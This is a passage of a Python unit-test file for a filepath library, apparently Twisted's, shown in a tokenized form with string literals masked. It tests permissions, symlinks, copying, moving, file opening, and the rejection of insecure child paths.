<EOL> """<STR_LIT>""" <EOL> def listdir ( self ) : <EOL> """<STR_LIT>""" <EOL> raise WindowsError ( <EOL> ERROR_DIRECTORY , <EOL> "<STR_LIT>" ) <EOL> class ListingCompatibilityTests ( BytesTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_windowsErrorExcept ( self ) : <EOL> """<STR_LIT>""" <EOL> fwp = FakeWindowsPath ( self . mktemp ( ) ) <EOL> self . assertRaises ( filepath . UnlistableError , fwp . children ) <EOL> self . assertRaises ( WindowsError , fwp . children ) <EOL> def test_alwaysCatchOSError ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> self . assertRaises ( OSError , fp . children ) <EOL> def test_keepOriginalAttributes ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> ose = self . assertRaises ( OSError , fp . children ) <EOL> d1 = list ( ose . __dict__ . keys ( ) ) <EOL> d1 . remove ( '<STR_LIT>' ) <EOL> d2 = list ( ose . originalException . __dict__ . keys ( ) ) <EOL> d1 . sort ( ) <EOL> d2 . sort ( ) <EOL> self . assertEqual ( d1 , d2 ) <EOL> class ExplodingFile : <EOL> """<STR_LIT>""" <EOL> closed = False <EOL> def read ( self , n = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> raise IOError ( ) <EOL> def write ( self , what ) : <EOL> """<STR_LIT>""" <EOL> raise IOError ( ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> self . closed = True <EOL> class TrackingFilePath ( filepath . FilePath ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , path , alwaysCreate = False , trackingList = None ) : <EOL> filepath . FilePath . __init__ ( self , path , alwaysCreate ) <EOL> if trackingList is None : <EOL> trackingList = [ ] <EOL> self . trackingList = trackingList <EOL> self . openedFiles = [ ] <EOL> def open ( self , * a , ** k ) : <EOL> """<STR_LIT>""" <EOL> f = filepath . FilePath . open ( self , * a , ** k ) <EOL> self . openedFiles . append ( f ) <EOL> return f <EOL> def openedPaths ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ path for path in self . trackingList if path . openedFiles ] <EOL> def clonePath ( self , name ) : <EOL> """<STR_LIT>""" <EOL> clone = TrackingFilePath ( name , trackingList = self . trackingList ) <EOL> self . trackingList . append ( clone ) <EOL> return clone <EOL> class ExplodingFilePath ( filepath . FilePath ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pathName , originalExploder = None ) : <EOL> """<STR_LIT>""" <EOL> filepath . FilePath . __init__ ( self , pathName ) <EOL> if originalExploder is None : <EOL> originalExploder = self <EOL> self . _originalExploder = originalExploder <EOL> def open ( self , mode = None ) : <EOL> """<STR_LIT>""" <EOL> f = self . _originalExploder . fp = ExplodingFile ( ) <EOL> return f <EOL> def clonePath ( self , name ) : <EOL> return ExplodingFilePath ( name , self . _originalExploder ) <EOL> class PermissionsTestCase ( BytesTestCase ) : <EOL> """<STR_LIT>""" <EOL> def assertNotUnequal ( self , first , second , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if first != second : <EOL> if msg is None : <EOL> msg = '<STR_LIT>' ; <EOL> if len ( msg ) > <NUM_LIT:0> : <EOL> msg += '<STR_LIT:\n>' <EOL> raise self . failureException ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( msg , pformat ( first ) , pformat ( second ) ) ) <EOL> return first <EOL> def test_rwxFromBools ( self ) : <EOL> """<STR_LIT>""" <EOL> for r in ( True , False ) : <EOL> for w in ( True , False ) : <EOL> for x in ( True , False ) : <EOL> rwx = filepath . RWX ( r , w , x ) <EOL> self . assertEqual ( rwx . read , r ) <EOL> self . assertEqual ( rwx . write , w ) <EOL> self . assertEqual ( rwx . execute , x ) <EOL> rwx = filepath . RWX ( True , True , True ) <EOL> self . assertTrue ( rwx . read and rwx . write and rwx . execute ) <EOL> def test_rwxEqNe ( self ) : <EOL> """<STR_LIT>""" <EOL> for r in ( True , False ) : <EOL> for w in ( True , False ) : <EOL> for x in ( True , False ) : <EOL> self . assertEqual ( filepath . RWX ( r , w , x ) , <EOL> filepath . RWX ( r , w , x ) ) <EOL> self . assertNotUnequal ( filepath . RWX ( r , w , x ) , <EOL> filepath . RWX ( r , w , x ) ) <EOL> self . assertNotEqual ( filepath . RWX ( True , True , True ) , <EOL> filepath . RWX ( True , True , False ) ) <EOL> self . assertNotEqual ( <NUM_LIT:3> , filepath . RWX ( True , True , True ) ) <EOL> def test_rwxShorthand ( self ) : <EOL> """<STR_LIT>""" <EOL> def getChar ( val , letter ) : <EOL> if val : <EOL> return letter <EOL> return '<STR_LIT:->' <EOL> for r in ( True , False ) : <EOL> for w in ( True , False ) : <EOL> for x in ( True , False ) : <EOL> rwx = filepath . RWX ( r , w , x ) <EOL> self . assertEqual ( rwx . shorthand ( ) , <EOL> getChar ( r , '<STR_LIT:r>' ) + <EOL> getChar ( w , '<STR_LIT:w>' ) + <EOL> getChar ( x , '<STR_LIT:x>' ) ) <EOL> self . assertEqual ( filepath . RWX ( True , False , True ) . shorthand ( ) , "<STR_LIT>" ) <EOL> def test_permissionsFromStat ( self ) : <EOL> """<STR_LIT>""" <EOL> def _rwxFromStat ( statModeInt , who ) : <EOL> def getPermissionBit ( what , who ) : <EOL> return ( statModeInt & <EOL> getattr ( stat , "<STR_LIT>" % ( what , who ) ) ) > <NUM_LIT:0> <EOL> return filepath . RWX ( * [ getPermissionBit ( what , who ) for what in <EOL> ( '<STR_LIT:R>' , '<STR_LIT>' , '<STR_LIT:X>' ) ] ) <EOL> for u in range ( <NUM_LIT:0> , <NUM_LIT:8> ) : <EOL> for g in range ( <NUM_LIT:0> , <NUM_LIT:8> ) : <EOL> for o in range ( <NUM_LIT:0> , <NUM_LIT:8> ) : <EOL> chmodString = "<STR_LIT>" % ( u , g , o ) <EOL> chmodVal = int ( chmodString , <NUM_LIT:8> ) <EOL> perm = filepath . Permissions ( chmodVal ) <EOL> self . assertEqual ( perm . user , <EOL> _rwxFromStat ( chmodVal , "<STR_LIT>" ) , <EOL> "<STR_LIT>" % <EOL> ( chmodString , perm . user ) ) <EOL> self . assertEqual ( perm . group , <EOL> _rwxFromStat ( chmodVal , "<STR_LIT>" ) , <EOL> "<STR_LIT>" % <EOL> ( chmodString , perm . group ) ) <EOL> self . assertEqual ( perm . other , <EOL> _rwxFromStat ( chmodVal , "<STR_LIT>" ) , <EOL> "<STR_LIT>" % <EOL> ( chmodString , perm . other ) ) <EOL> perm = filepath . Permissions ( <NUM_LIT> ) <EOL> for who in ( "<STR_LIT:user>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> for what in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> self . assertTrue ( getattr ( getattr ( perm , who ) , what ) ) <EOL> def test_permissionsEq ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( filepath . Permissions ( <NUM_LIT> ) , <EOL> filepath . Permissions ( <NUM_LIT> ) ) <EOL> self . assertNotUnequal ( filepath . Permissions ( <NUM_LIT> ) , <EOL> filepath . Permissions ( <NUM_LIT> ) ) <EOL> self . assertNotEqual ( filepath . Permissions ( <NUM_LIT> ) , <EOL> filepath . Permissions ( <NUM_LIT> ) ) <EOL> self . assertNotEqual ( <NUM_LIT:3> , filepath . Permissions ( <NUM_LIT> ) ) <EOL> def test_permissionsShorthand ( self ) : <EOL> """<STR_LIT>""" <EOL> for u in range ( <NUM_LIT:0> , <NUM_LIT:8> ) : <EOL> for g in range ( <NUM_LIT:0> , <NUM_LIT:8> ) : <EOL> for o in range ( <NUM_LIT:0> , <NUM_LIT:8> ) : <EOL> perm = filepath . Permissions ( int ( "<STR_LIT>" % ( u , g , o ) , <NUM_LIT:8> ) ) <EOL> self . assertEqual ( perm . shorthand ( ) , <EOL> '<STR_LIT>' . join ( x . shorthand ( ) for x in ( <EOL> perm . user , perm . group , perm . other ) ) ) <EOL> self . assertEqual ( filepath . Permissions ( <NUM_LIT> ) . shorthand ( ) , "<STR_LIT>" ) <EOL> class FilePathTestCase ( AbstractFilePathTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_chmod ( self ) : <EOL> """<STR_LIT>""" <EOL> for mode in ( <NUM_LIT> , <NUM_LIT> ) : <EOL> self . path . child ( b"<STR_LIT>" ) . chmod ( mode ) <EOL> self . assertEqual ( <EOL> stat . S_IMODE ( os . stat ( self . path . child ( b"<STR_LIT>" ) . path ) . st_mode ) , <EOL> mode ) <EOL> def symlink ( self , target , name ) : <EOL> """<STR_LIT>""" <EOL> if getattr ( os , '<STR_LIT>' , None ) is None : <EOL> raise SkipTest ( <EOL> "<STR_LIT>" ) <EOL> os . symlink ( target , name ) <EOL> def createLinks ( self ) : <EOL> """<STR_LIT>""" <EOL> subdir = self . path . child ( b"<STR_LIT>" ) <EOL> self . symlink ( subdir . path , self . _mkpath ( b"<STR_LIT>" ) ) <EOL> self . symlink ( subdir . child ( b"<STR_LIT>" ) . path , self . _mkpath ( b"<STR_LIT>" ) ) <EOL> self . symlink ( subdir . child ( b"<STR_LIT>" ) . path , <EOL> self . _mkpath ( b"<STR_LIT>" , b"<STR_LIT>" ) ) <EOL> def test_realpathSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> self . createLinks ( ) <EOL> self . symlink ( self . path . child ( b"<STR_LIT>" ) . path , <EOL> self . path . child ( b"<STR_LIT>" ) . path ) <EOL> self . assertEqual ( self . path . child ( b"<STR_LIT>" ) . realpath ( ) , <EOL> self . path . child ( b"<STR_LIT>" ) . child ( b"<STR_LIT>" ) ) <EOL> def test_realpathCyclicalSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> self . symlink ( self . path . child ( b"<STR_LIT>" ) . path , self . path . child ( b"<STR_LIT>" ) . path ) <EOL> self . symlink ( self . path . child ( b"<STR_LIT>" ) . path , self . path . child ( b"<STR_LIT>" ) . path ) <EOL> self . assertRaises ( filepath . LinkError , <EOL> self . path . child ( b"<STR_LIT>" ) . realpath ) <EOL> def test_realpathNoSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . path . child ( b"<STR_LIT>" ) . realpath ( ) , <EOL> self . path . child ( b"<STR_LIT>" ) ) <EOL> def test_walkCyclicalSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> self . createLinks ( ) <EOL> self . symlink ( self . path . child ( b"<STR_LIT>" ) . path , <EOL> self . path . child ( b"<STR_LIT>" ) . child ( b"<STR_LIT>" ) . path ) <EOL> def iterateOverPath ( ) : <EOL> return [ foo . path for foo in self . path . walk ( ) ] <EOL> self . assertRaises ( filepath . LinkError , iterateOverPath ) <EOL> def test_walkObeysDescendWithCyclicalSymlinks ( self ) : <EOL> """<STR_LIT>""" <EOL> self . createLinks ( ) <EOL> self . symlink ( self . path . child ( b"<STR_LIT>" ) . path , <EOL> self . path . child ( b"<STR_LIT>" ) . child ( b"<STR_LIT>" ) . path ) <EOL> def noSymLinks ( path ) : <EOL> return not path . islink ( ) <EOL> def iterateOverPath ( ) : <EOL> return [ foo . path for foo in self . path . walk ( descend = noSymLinks ) ] <EOL> self . assertTrue ( iterateOverPath ( ) ) <EOL> def test_walkObeysDescend ( self ) : <EOL> """<STR_LIT>""" <EOL> self . createLinks ( ) <EOL> def noSymLinks ( path ) : <EOL> return not path . islink ( ) <EOL> x = [ foo . path for foo in self . path . walk ( descend = noSymLinks ) ] <EOL> self . assertEqual ( set ( x ) , set ( self . all ) ) <EOL> def test_getAndSet ( self ) : <EOL> content = b'<STR_LIT>' <EOL> self . path . child ( b'<STR_LIT>' ) . setContent ( content ) <EOL> newcontent = self . path . child ( b'<STR_LIT>' ) . getContent ( ) <EOL> self . assertEqual ( content , newcontent ) <EOL> content = b'<STR_LIT:content>' <EOL> self . path . child ( b'<STR_LIT>' ) . setContent ( content , b'<STR_LIT>' ) <EOL> newcontent = self . path . child ( b'<STR_LIT>' ) . getContent ( ) <EOL> self . assertEqual ( content , newcontent ) <EOL> def test_getContentFileClosing ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = ExplodingFilePath ( b"<STR_LIT>" ) <EOL> self . assertRaises ( IOError , fp . getContent ) <EOL> self . assertTrue ( fp . fp . closed ) <EOL> def test_symbolicLink ( self ) : <EOL> """<STR_LIT>""" <EOL> s4 = self . path . child ( b"<STR_LIT>" ) <EOL> s3 = self . path . child ( b"<STR_LIT>" ) <EOL> self . symlink ( s3 . path , s4 . path ) <EOL> self . assertTrue ( s4 . islink ( ) ) <EOL> self . assertFalse ( s3 . islink ( ) ) <EOL> self . assertTrue ( s4 . isdir ( ) ) <EOL> self . assertTrue ( s3 . isdir ( ) ) <EOL> def test_linkTo ( self ) : <EOL> """<STR_LIT>""" <EOL> targetLinks = [ <EOL> ( self . path . child ( b"<STR_LIT>" ) , self . path . child ( b"<STR_LIT>" ) ) , <EOL> ( self . path . child ( b"<STR_LIT>" ) . child ( b"<STR_LIT>" ) , <EOL> self . path . child ( b"<STR_LIT>" ) ) <EOL> ] <EOL> for target , link in targetLinks : <EOL> target . linkTo ( link ) <EOL> self . assertTrue ( link . islink ( ) , "<STR_LIT>" ) <EOL> self . assertEqual ( target . isdir ( ) , link . isdir ( ) ) <EOL> self . assertEqual ( target . isfile ( ) , link . isfile ( ) ) <EOL> def test_linkToErrors ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( OSError , self . path . child ( b"<STR_LIT>" ) . linkTo , <EOL> self . path . child ( b'<STR_LIT>' ) . child ( b'<STR_LIT>' ) ) <EOL> self . assertRaises ( OSError , self . path . child ( b"<STR_LIT>" ) . linkTo , <EOL> self . path . child ( b'<STR_LIT>' ) . child ( b'<STR_LIT>' ) ) <EOL> if not getattr ( os , "<STR_LIT>" , None ) : <EOL> skipMsg = "<STR_LIT>" <EOL> test_symbolicLink . skip = skipMsg <EOL> test_linkTo . skip = skipMsg <EOL> test_linkToErrors . skip = skipMsg <EOL> def testMultiExt ( self ) : <EOL> f3 = self . path . child ( b'<STR_LIT>' ) . child ( b'<STR_LIT>' ) <EOL> exts = b'<STR_LIT>' , b'<STR_LIT>' , b'<STR_LIT>' , b'<STR_LIT>' , b'<STR_LIT>' <EOL> self . failIf ( f3 . siblingExtensionSearch ( * exts ) ) <EOL> f3e = f3 . siblingExtension ( b"<STR_LIT>" ) <EOL> f3e . touch ( ) <EOL> self . failIf ( not f3 . siblingExtensionSearch ( * exts ) . exists ( ) ) <EOL> self . failIf ( not f3 . siblingExtensionSearch ( b'<STR_LIT:*>' ) . exists ( ) ) <EOL> f3e . remove ( ) <EOL> self . failIf ( f3 . siblingExtensionSearch ( * exts ) ) <EOL> def testPreauthChild ( self ) : <EOL> fp = filepath . FilePath ( b'<STR_LIT:.>' ) <EOL> fp . preauthChild ( b'<STR_LIT>' ) <EOL> self . assertRaises ( filepath . InsecurePath , fp . child , b'<STR_LIT>' ) <EOL> def testStatCache ( self ) : <EOL> p = self . path . child ( b'<STR_LIT>' ) <EOL> p . touch ( ) <EOL> self . assertEqual ( p . getsize ( ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( abs ( p . getmtime ( ) - time . time ( ) ) // <NUM_LIT:20> , <NUM_LIT:0> ) <EOL> self . assertEqual ( abs ( p . getctime ( ) - time . time ( ) ) // <NUM_LIT:20> , <NUM_LIT:0> ) <EOL> self . assertEqual ( abs ( p . getatime ( ) - time . time ( ) ) // <NUM_LIT:20> , <NUM_LIT:0> ) <EOL> self . assertEqual ( p . exists ( ) , True ) <EOL> self . assertEqual ( p . exists ( ) , True ) <EOL> os . remove ( p . path ) <EOL> self . assertEqual ( p . exists ( ) , True ) <EOL> p . restat ( reraise = False ) <EOL> self . assertEqual ( p . exists ( ) , False ) <EOL> self . assertEqual ( p . islink ( ) , False ) <EOL> self . assertEqual ( p . isdir ( ) , False ) <EOL> self . assertEqual ( p . isfile ( ) , False ) <EOL> def testPersist ( self ) : <EOL> newpath = pickle . loads ( pickle . dumps ( self . path ) ) <EOL> self . assertEqual ( self . path . __class__ , newpath . __class__ ) <EOL> self . assertEqual ( self . path . path , newpath . path ) <EOL> def testInsecureUNIX ( self ) : <EOL> self . assertRaises ( filepath . InsecurePath , self . path . child , b"<STR_LIT:..>" ) <EOL> self . assertRaises ( filepath . InsecurePath , self . path . child , b"<STR_LIT>" ) <EOL> self . assertRaises ( filepath . InsecurePath , self . path . child , b"<STR_LIT>" ) <EOL> def testInsecureWin32 ( self ) : <EOL> self . assertRaises ( filepath . InsecurePath , self . path . child , b"<STR_LIT>" ) <EOL> self . assertRaises ( filepath . InsecurePath , self . path . child , b"<STR_LIT>" ) <EOL> if platform . getType ( ) != '<STR_LIT:win32>' : <EOL> testInsecureWin32 . skip = "<STR_LIT>" <EOL> def testInsecureWin32Whacky ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( filepath . InsecurePath , self . path . child , b"<STR_LIT>" ) <EOL> self . assertRaises ( filepath . InsecurePath , self . path . child , b"<STR_LIT>" ) <EOL> self . assertRaises ( filepath . InsecurePath , self . path . child , r"<STR_LIT>" ) <EOL> if platform . getType ( ) != '<STR_LIT:win32>' : <EOL> testInsecureWin32Whacky . skip = "<STR_LIT>" <EOL> def testComparison ( self ) : <EOL> self . assertEqual ( filepath . FilePath ( b'<STR_LIT:a>' ) , <EOL> filepath . FilePath ( b'<STR_LIT:a>' ) ) <EOL> self . failUnless ( filepath . FilePath ( b'<STR_LIT:z>' ) > <EOL> filepath . FilePath ( b'<STR_LIT:a>' ) ) <EOL> self . failUnless ( filepath . FilePath ( b'<STR_LIT:z>' ) >= <EOL> filepath . FilePath ( b'<STR_LIT:a>' ) ) <EOL> self . failUnless ( filepath . FilePath ( b'<STR_LIT:a>' ) >= <EOL> filepath . FilePath ( b'<STR_LIT:a>' ) ) <EOL> self . failUnless ( filepath . FilePath ( b'<STR_LIT:a>' ) <= <EOL> filepath . FilePath ( b'<STR_LIT:a>' ) ) <EOL> self . failUnless ( filepath . FilePath ( b'<STR_LIT:a>' ) < <EOL> filepath . FilePath ( b'<STR_LIT:z>' ) ) <EOL> self . failUnless ( filepath . FilePath ( b'<STR_LIT:a>' ) <= <EOL> filepath . FilePath ( b'<STR_LIT:z>' ) ) <EOL> self . failUnless ( filepath . FilePath ( b'<STR_LIT:a>' ) != <EOL> filepath . FilePath ( b'<STR_LIT:z>' ) ) <EOL> self . failUnless ( filepath . FilePath ( b'<STR_LIT:z>' ) != <EOL> filepath . FilePath ( b'<STR_LIT:a>' ) ) <EOL> self . failIf ( filepath . FilePath ( b'<STR_LIT:z>' ) != <EOL> filepath . FilePath ( b'<STR_LIT:z>' ) ) <EOL> def test_descendantOnly ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> filepath . InsecurePath , self . path . descendant , [ b'<STR_LIT:a>' , b'<STR_LIT:..>' ] ) <EOL> def testSibling ( self ) : <EOL> p = self . path . child ( b'<STR_LIT>' ) <EOL> ts = p . sibling ( b'<STR_LIT>' ) <EOL> self . assertEqual ( ts . dirname ( ) , p . dirname ( ) ) <EOL> self . assertEqual ( ts . basename ( ) , b'<STR_LIT>' ) <EOL> ts . createDirectory ( ) <EOL> self . assertIn ( ts , self . path . children ( ) ) <EOL> def testTemporarySibling ( self ) : <EOL> ts = self . path . temporarySibling ( ) <EOL> self . assertEqual ( ts . dirname ( ) , self . path . dirname ( ) ) <EOL> self . assertNotIn ( ts . basename ( ) , self . path . listdir ( ) ) <EOL> ts . createDirectory ( ) <EOL> self . assertIn ( ts , self . path . parent ( ) . children ( ) ) <EOL> def test_temporarySiblingExtension ( self ) : <EOL> """<STR_LIT>""" <EOL> testExtension = b"<STR_LIT>" <EOL> ts = self . path . temporarySibling ( testExtension ) <EOL> self . assertTrue ( ts . basename ( ) . endswith ( testExtension ) , <EOL> "<STR_LIT>" % ( <EOL> ts . basename ( ) , testExtension ) ) <EOL> def test_removeDirectory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . path . remove ( ) <EOL> self . failIf ( self . path . exists ( ) ) <EOL> def test_removeWithSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> link = self . path . child ( b"<STR_LIT>" ) <EOL> self . symlink ( self . path . child ( b"<STR_LIT>" ) . path , link . path ) <EOL> link . remove ( ) <EOL> self . assertFalse ( link . exists ( ) ) <EOL> self . assertTrue ( self . path . child ( b"<STR_LIT>" ) . exists ( ) ) <EOL> def test_copyToDirectory ( self ) : <EOL> """<STR_LIT>""" <EOL> oldPaths = list ( self . path . walk ( ) ) <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> self . path . copyTo ( fp ) <EOL> self . path . remove ( ) <EOL> fp . copyTo ( self . path ) <EOL> newPaths = list ( self . path . walk ( ) ) <EOL> newPaths . sort ( ) <EOL> oldPaths . sort ( ) <EOL> self . assertEqual ( newPaths , oldPaths ) <EOL> def test_copyToMissingDestFileClosing ( self ) : <EOL> """<STR_LIT>""" <EOL> nosuch = self . path . child ( b"<STR_LIT>" ) <EOL> nosuch . isfile = lambda : True <EOL> destination = ExplodingFilePath ( self . mktemp ( ) ) <EOL> self . assertRaises ( IOError , nosuch . copyTo , destination ) <EOL> self . assertTrue ( destination . fp . closed ) <EOL> def test_copyToFileClosing ( self ) : <EOL> """<STR_LIT>""" <EOL> destination = ExplodingFilePath ( self . mktemp ( ) ) <EOL> source = ExplodingFilePath ( __file__ ) <EOL> self . assertRaises ( IOError , source . copyTo , destination ) <EOL> self . assertTrue ( source . fp . closed ) <EOL> self . assertTrue ( destination . fp . closed ) <EOL> def test_copyToDirectoryItself ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( ( OSError , IOError ) , <EOL> self . path . copyTo , self . path . child ( b'<STR_LIT>' ) ) <EOL> def test_copyToWithSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> self . symlink ( self . path . child ( b"<STR_LIT>" ) . path , <EOL> self . path . child ( b"<STR_LIT>" ) . path ) <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> self . path . copyTo ( fp ) <EOL> self . assertFalse ( fp . child ( b"<STR_LIT>" ) . islink ( ) ) <EOL> self . assertEqual ( [ x . basename ( ) for x in fp . child ( b"<STR_LIT>" ) . children ( ) ] , <EOL> [ x . basename ( ) for x in fp . child ( b"<STR_LIT>" ) . children ( ) ] ) <EOL> def test_copyToWithoutSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> self . symlink ( b"<STR_LIT>" , self . path . child ( b"<STR_LIT>" ) . path ) <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> self . path . copyTo ( fp , followLinks = False ) <EOL> self . assertTrue ( fp . child ( b"<STR_LIT>" ) . islink ( ) ) <EOL> self . assertEqual ( os . readlink ( self . path . child ( b"<STR_LIT>" ) . path ) , <EOL> os . readlink ( fp . child ( b"<STR_LIT>" ) . path ) ) <EOL> def test_copyToMissingSource ( self ) : <EOL> """<STR_LIT>""" <EOL> path = filepath . FilePath ( self . mktemp ( ) ) <EOL> exc = self . assertRaises ( OSError , path . copyTo , b'<STR_LIT>' ) <EOL> self . assertEqual ( exc . errno , errno . ENOENT ) <EOL> def test_moveTo ( self ) : <EOL> """<STR_LIT>""" <EOL> oldPaths = list ( self . path . walk ( ) ) <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> self . path . moveTo ( fp ) <EOL> fp . moveTo ( self . path ) <EOL> newPaths = list ( self . path . walk ( ) ) <EOL> newPaths . sort ( ) <EOL> oldPaths . sort ( ) <EOL> self . assertEqual ( newPaths , oldPaths ) <EOL> def test_moveToExistsCache ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> fp2 = filepath . FilePath ( self . mktemp ( ) ) <EOL> fp . touch ( ) <EOL> self . assertEqual ( fp . exists ( ) , True ) <EOL> self . assertEqual ( fp2 . exists ( ) , False ) <EOL> fp . moveTo ( fp2 ) <EOL> self . assertEqual ( fp . exists ( ) , False ) <EOL> self . assertEqual ( fp2 . exists ( ) , True ) <EOL> def test_moveToExistsCacheCrossMount ( self ) : <EOL> """<STR_LIT>""" <EOL> self . setUpFaultyRename ( ) <EOL> self . test_moveToExistsCache ( ) <EOL> def test_moveToSizeCache ( self , hook = lambda : None ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> fp2 = filepath . FilePath ( self . mktemp ( ) ) <EOL> fp . setContent ( b"<STR_LIT>" ) <EOL> fp2 . setContent ( b"<STR_LIT>" ) <EOL> hook ( ) <EOL> self . assertEqual ( fp . getsize ( ) , <NUM_LIT:4> ) <EOL> self . assertEqual ( fp2 . getsize ( ) , <NUM_LIT:10> ) <EOL> os . remove ( fp2 . path ) <EOL> self . assertEqual ( fp2 . getsize ( ) , <NUM_LIT:10> ) <EOL> fp . moveTo ( fp2 ) <EOL> self . assertEqual ( fp2 . getsize ( ) , <NUM_LIT:4> ) <EOL> def test_moveToSizeCacheCrossMount ( self ) : <EOL> """<STR_LIT>""" <EOL> self . test_moveToSizeCache ( hook = self . setUpFaultyRename ) <EOL> def test_moveToError ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( ( OSError , IOError ) , self . path . moveTo , self . path . child ( b'<STR_LIT>' ) ) <EOL> def setUpFaultyRename ( self ) : <EOL> """<STR_LIT>""" <EOL> invokedWith = [ ] <EOL> def faultyRename ( src , dest ) : <EOL> invokedWith . append ( ( src , dest ) ) <EOL> if len ( invokedWith ) == <NUM_LIT:1> : <EOL> raise OSError ( errno . EXDEV , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return originalRename ( src , dest ) <EOL> originalRename = os . rename <EOL> self . patch ( os , "<STR_LIT>" , faultyRename ) <EOL> return invokedWith <EOL> def test_crossMountMoveTo ( self ) : <EOL> """<STR_LIT>""" <EOL> invokedWith = self . setUpFaultyRename ( ) <EOL> self . test_moveTo ( ) <EOL> self . assertTrue ( invokedWith ) <EOL> def test_crossMountMoveToWithSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> invokedWith = self . setUpFaultyRename ( ) <EOL> f2 = self . path . child ( b'<STR_LIT>' ) <EOL> f3 = self . path . child ( b'<STR_LIT>' ) <EOL> self . symlink ( self . path . child ( b'<STR_LIT>' ) . path , f2 . path ) <EOL> f2 . moveTo ( f3 ) <EOL> self . assertFalse ( f3 . islink ( ) ) <EOL> self . assertEqual ( f3 . getContent ( ) , b'<STR_LIT>' ) <EOL> self . assertTrue ( invokedWith ) <EOL> def test_crossMountMoveToWithoutSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> invokedWith = self . setUpFaultyRename ( ) <EOL> f2 = self . path . child ( b'<STR_LIT>' ) <EOL> f3 = self . path . child ( b'<STR_LIT>' ) <EOL> self . symlink ( self . path . child ( b'<STR_LIT>' ) . path , f2 . path ) <EOL> f2 . moveTo ( f3 , followLinks = False ) <EOL> self . assertTrue ( f3 . islink ( ) ) <EOL> self . assertEqual ( f3 . getContent ( ) , b'<STR_LIT>' ) <EOL> self . assertTrue ( invokedWith ) <EOL> def test_createBinaryMode ( self ) : <EOL> """<STR_LIT>""" <EOL> path = filepath . FilePath ( self . mktemp ( ) ) <EOL> f = path . create ( ) <EOL> self . failUnless ( "<STR_LIT:b>" in f . mode ) <EOL> f . write ( b"<STR_LIT:\n>" ) <EOL> f . close ( ) <EOL> read = open ( path . path , "<STR_LIT:rb>" ) . read ( ) <EOL> self . assertEqual ( read , b"<STR_LIT:\n>" ) <EOL> def testOpen ( self ) : <EOL> nonexistent = self . path . child ( b'<STR_LIT>' ) <EOL> e = self . assertRaises ( IOError , nonexistent . open ) <EOL> self . assertEqual ( e . errno , errno . ENOENT ) <EOL> writer = self . path . child ( b'<STR_LIT>' ) <EOL> f = writer . open ( '<STR_LIT:w>' ) <EOL> f . write ( b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> f = writer . open ( ) <EOL> self . assertEqual ( f . read ( ) , b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> f = writer . open ( '<STR_LIT:w>' ) <EOL> f . close ( ) <EOL> f = writer . open ( ) <EOL> self . assertEqual ( f . read ( ) , b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> appender = self . path . child ( b'<STR_LIT>' ) <EOL> f = appender . open ( '<STR_LIT:w>' ) <EOL> f . write ( b'<STR_LIT:abc>' ) <EOL> f . close ( ) <EOL> f = appender . open ( '<STR_LIT:a>' ) <EOL> f . write ( b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> f = appender . open ( '<STR_LIT:r>' ) <EOL> self . assertEqual ( f . read ( ) , b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> f = appender . open ( '<STR_LIT>' ) <EOL> self . assertEqual ( f . read ( ) , b'<STR_LIT>' ) <EOL> f . seek ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> f . write ( b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> f = appender . open ( '<STR_LIT:r>' ) <EOL> self . assertEqual ( f . read ( ) , b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> f = appender . open ( '<STR_LIT>' ) <EOL> self . assertEqual ( f . read ( ) , b'<STR_LIT>' ) <EOL> f . seek ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> f . write ( b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> f = appender . open ( '<STR_LIT>' ) <EOL> f . write ( b'<STR_LIT>' ) <EOL> f . seek ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> self . assertEqual ( f . read ( ) , b'<STR_LIT>' ) <EOL> f . seek ( <NUM_LIT:0> , <NUM_LIT:0> ) 